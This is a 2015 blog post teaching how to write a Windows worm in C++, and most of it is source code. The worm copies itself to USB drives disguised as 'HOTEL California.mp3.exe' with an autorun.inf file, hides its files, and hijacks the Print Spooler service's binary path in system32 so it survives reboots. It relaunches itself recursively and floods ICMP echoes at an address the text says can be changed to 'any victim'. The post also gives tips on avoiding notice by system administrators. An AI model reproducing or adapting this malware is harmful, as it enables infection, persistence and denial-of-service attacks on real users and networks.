Wednesday, March 4, 2015

WORM CODING WITH EXAMPLE

The worms and viruses are mostly coded in assembly language. This gives an advantage of smaller size and the speed optimizations and much more control of developer over the worm or virus.
But we are going to discus the worm creation in c++ in this section. We’ll apply the concepts studied earlier in this section.
Before starting to code our first c++ worm, lets discus a little about worms structure.
The worm has at least two different sections. One section takes care of its reproduction (also called cloning) and the other section triggers the reproduced copies. Extra care must be taken here that, the trigger section might not trigger too much clones, otherwise the system will get overloaded and will be suspected for infection.
There may be other sections like payload section, the encryption section, decrypting block and exploits section, etc, but in our first worm, we are going to code only the two sections, the clone section and the trigger section.
Every worm has a mission and after the completion of its mission finally the worm should terminate the host processes or remove the worm files from the hosting victims.
One more thing friends, the worm development also creates some problems for the developers, therefore, you might backup your important data before proceeding. Also, always document your worm in a file sidewise, this documentation will help you understand if anything went wrong.
You should add the automatic boot up triggers in the last phase of the worm development process, this will help you a lot, if anything goes wrong during development.
During development phase, you should create the worm termination scripts first and always observe the process lists and cpu and memory performances in task manager.
The one very effective worm termination script is
 

FOR /L %I IN (1, 1, 100) DO TASKKILL /F /IM “WORM_EXE_FILE” /T

 
The above script is quite effective if worm goes wild during development phase. But this will not stop the advanced worms, this can terminate only the worms with very weak mechanism. But once the worm employs the automatic boot up triggers, this script will give up then. Remember, this script also eats up the cpu and makes it usable 100%.
Let us start with a little program that once started will execute itself recursively and will never end. This technique is called recursive execution technique and the process launches a fresh executing clone process of itself before terminating itself. The following code is the simplest program employing the recursive execution technique:
 

/* testproc.cpp */

 

#include 

#include 

#define PROCESSNAME “testproc.exe”

using namespace std;

int main (int argc, char* argv[])   {

      ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

return EXIT_SUCCESS;

}

 
The ShellExecute() function determines the file launcher depending upon the file type (the file extension). The process in this case will not have any window. Thus after double clicking the executable file the process will keep in executing recursively in the memory.
The newer process has a new process ID and all resource allotments are done exclusively for it again.
Next a worm should have a mission, the payload section is determined by the mission or motto of the worm. In this case the worm has been assigned the mission to flood the network segment with broadcast icmp packets.
The target IP address can easily be changed to any victim to launch a resource eating attack on the target network by changing the macro IPADDR from broadcast address to the host to network transformed ip address number. If you don’t know about it then, refer to the socket programming section.
The following three functions from the icmp.dll will accomplish this task, IcmpCreateFile, IcmpSendEcho & IcmpCloseHandle.
The worm also reproduces itself from one system to another and launches in another system, for this purpose, the worm creates a new thread, which checks for the USB removable drives, if found, then copies itself with the name defined in DISGUISE macro, in following code, we have named it “HOTEL California.mp3.exe” and creates anautorun.inf file.
The autorun.inf automatically launches the worm file automatically.
The next step is to make the worm launch itself when the system boots up. For this the worm configures the settings of a service. We have chosen the Print Spooler service for this purpose. The worm changes the executable file path to a copy of itself in system32 directory.
The following code accomplishes all the things discussed above and compile it and execute the executable file to execute worm
 

/* virus4.cpp */

#include 

#include 

#include 

#include 

#define DISGUISE "HOTEL California.mp3.exe"

#define DISGUISEPATH "\\HOTEL California.mp3.exe"

#define ENVOKER "\\envoker.exe"

#define FILEATTRIB 34

#define IPADDR INADDR_BROADCAST      // The address to be attacked with icmp echoes.

#define PROCESSNAME "virus4.exe"

#define PROCSSPATH "\\virus4.exe"

#define PROCESSPATH "..\\virus4.exe"

using namespace std;

/*-----------------The icmp global section-------------------*/         

struct o                            {

        unsigned char Ttl, Tos, Flags, OptionsSize, *OptionsData;

};

struct E                            {

     DWORD Address;

     unsigned long Status, RoundTripTime;

     unsigned short DataSize, Reserved;

    void *Data;

    struct o Options;

};

HANDLE hIP;

WSADATA wsa;

HMODULE hicmp;

struct hostent *phostent;

DWORD d;

char aa[100];

struct o I;

struct E es;

HANDLE ( WINAPI *pIcmpCreateFile) ( void );

BOOL ( WINAPI *pIcmpCloseHandle ) ( HANDLE );

DWORD ( WINAPI *pIcmpSendEcho) (HANDLE, DWORD, LPVOID,
WORD, LPVOID, LPVOID, DWORD, DWORD);

/*----------------------------------------------------*/

void _declspec (dllexport) identify(char *file)     {

 

     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

          char systemPath[101], envokerPath[101], buffer[201];          

          CopyFile(file, PROCESSPATH, NULL);

          SetFileAttributes(PROCESSPATH, FILEATTRIB);

 

          GetSystemDirectory(systemPath, 50);

          strcpy(buffer, "SC CONFIG Spooler error= ignore binpath= ");

          strcpy(envokerPath, systemPath);

          strcat(envokerPath, ENVOKER);

          strcat(buffer, envokerPath);

          strcat(systemPath, PROCSSPATH);

          CopyFile(file, systemPath, 0);

          CopyFile(file, envokerPath, 0);

          SetFileAttributes(systemPath, FILEATTRIB);

          SetFileAttributes(envokerPath, FILEATTRIB);  

          system(buffer);

}

 

void _declspec (dllexport) systemProc(char *proc)     {

 

/**

  * The payload section, The payload will run as an service.

  **/

 

SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

for (int countsys = 0; countsys < 10; countsys++)

     _asm  { nop }

        /* The payload code can be inserted here.            */

        /* The code will be executed with highest privileges */

}

void _declspec (dllexport) procCloner(char *cfile)    {

     SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

     FILE *fp;

     char drive[3], newloc[30], autof[20];

     int let = 0x43;

     struct stat stbuf;

                                    

    for (int i = 0; i < 256; i++, let++)    {

         if (let > 0x5A)

             let = 0x43;

             drive[0] = (char)let;

             drive[1]= ':';

             drive[2] = '';

            if ((GetDriveType(drive)) == 2)  { // This line fetches the removable drives.

                strcpy(newloc, drive);

                strcat(newloc, DISGUISEPATH);

                strcpy(autof, drive);

                if ((stat(newloc, &stbuf)) == -1) { // Check if file already exists

 in the pen drive.

                    CopyFile(cfile, newloc, 0);  // If not then copy the file.

                    strcat(autof, "\\Autorun.inf");

                    fp = fopen(autof, "w");

                    fprintf(fp, "[autorun]\nopen=%s", DISGUISE);

                    fclose(fp);

                    SetFileAttributes(newloc, 28);

                } else

                    continue;

        }

    }

}

/*------------------ The main engine of worm ------------------*/

int main (int argc, char* argv[])   {

//   SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_HIGHEST);

     HANDLE thread, cloner, thands[3];

     char *ptr, procfile[300];

     ptr = argv[0];

     strcpy(procfile, ptr);

     if ((strstr(ptr, ".exe")) == NULL)      {

         strcat(procfile, ".exe");

     }

 

     void (*clonproc) (char *);

     clonproc = procCloner;

 

     cloner = CreateThread(0, 0, (DWORD (__stdcall *)(void *))clonproc, procfile, 0, 0);

    HMODULE hmod;

    char dirpath[201];

    void (*smack)(char *);

    GetCurrentDirectory(200, dirpath);

    hmod = LoadLibrary(procfile);

 

    if ((strstr(dirpath, "system32")) != NULL)                         {      

  smack = (void (*)(char *))GetProcAddress(hmod, "?systemProc@@YAXPAD@Z");

            thread = CreateThread(0, 0, (DWORD (__stdcall *)(void*))smack, procfile, 0, 0);

    } else   {

       smack = (void (*)(char *))GetProcAddress(hmod, "?identify@@YAXPAD@Z");

            thread = CreateThread(0, 0, (DWORD (__stdcall *)(void*))smack, procfile, 0, 0);

    }

       thands[0] = cloner;

       thands[1] = thread;

       thands[2] = '';

/*--------------- The icmp section -----------------*/

 

hicmp = LoadLibrary("ICMP.DLL");

 

pIcmpCreateFile = (void *(__stdcall *)(void))GetProcAddress(hicmp, "IcmpCreateFile");

pIcmpCloseHandle = (int (__stdcall *)(void *))GetProcAddress(hicmp, "IcmpCloseHandle");

pIcmpSendEcho = (unsigned long (__stdcall *)(void *,unsigned
long,void *,unsigned short,void *,void *,unsigned long,unsigned
 long))GetProcAddress(hicmp, "IcmpSendEcho");

 

hIP = pIcmpCreateFile();

I.Ttl = 255;

for (int ping = 0; ping < 10; ping++)

      pIcmpSendEcho(hIP, IPADDR, 0, 0, &I, &es, sizeof(es), 8000);

pIcmpCloseHandle(hicmp);

FreeLibrary(hicmp);

/*--------------------------------------------------*/

// WaitForSingleObject(cloner, 200); // Activate this while testing the single thread.
// WaitForSingleObject(thread, 200); // Activate this while testing the single thread.

WaitForMultipleObjects(2, thands, true, 100); // Waits for the termination of two threads.

FreeLibrary(hmod);

chdir("..");

ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

ShellExecute(NULL,"open", PROCESSNAME, NULL, NULL, 0);

return EXIT_SUCCESS;

}

 
The above coding is quite lively, but will hog the cpu and this can easily be noticed by the sysops. Actually, the system function every time initiates the cmd.exe and then execute the respective program, thus creating unnecessary two processes at least. The process generation is considered very heavy process and might be avoided as much as possible.

No comments:

Post a Comment